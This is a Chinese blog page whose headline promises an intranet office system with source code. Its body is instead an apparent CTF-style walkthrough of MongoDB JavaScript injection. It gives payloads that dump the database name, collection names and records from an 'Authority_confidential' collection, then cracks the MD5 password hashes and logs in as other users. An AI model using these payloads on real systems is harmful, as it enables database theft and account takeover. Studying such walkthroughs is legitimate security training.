0
点赞
收藏
分享

微信扫一扫

一款专为内网办公环境设计的操作系统,集成了Word、Excel、PPT、PDF编辑器,内网聊天、白板、思维导图等多款办公工具(附源码)

精进的医生 2024-08-26 阅读 34
数据库

c924ecd387d042d49b51d20e804bc282.png

构造数据回显

'});return ({title:'1',content:'2

e5e1754abcd348bea471d262b83efc27.png

成功回显1,2,接下来我们开始尝试查询数据库

'});return({title:tojson(db),content:'2

a34802869b70486ea188bb0b357d38f3.png

得到之后我们就可以继续查询他的表名了

'});return({title:tojson(db.getCollectionNames()),content:'2

764ebf1047a74df28a47e66888391ba7.png

 

最后我们就可以爆出他表里的数据了

'});return({title:tojson(db.Authority_confidential.find()[0]),content:'2

d3e6a7e99b8b47b5886b7cc3e96537b5.png

 

得到密码之后,我们就可以获得数据了,先将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。如果第⼀个⽤户账号密码登录不了,我们就改变查询的索引“find()[1]"查询 其他的⽤户账号密码登录即可

 

f926949ffdde4faf88f059b9cc13c118.png

1da5e0e7483540c3b16ecb6fc19d9a44.png

这里显示用户已禁用,那么我们就换一个用户

 

a62ef611ee274c999902601e9ac05323.png

e515dd70288c4524a6fa086a44f90eec.png

好了这里我们就登录进去了

fe3d1f1e61bb4ea9b9ef9063474c9c32.png

 

 

 

 

 

举报
0 条评论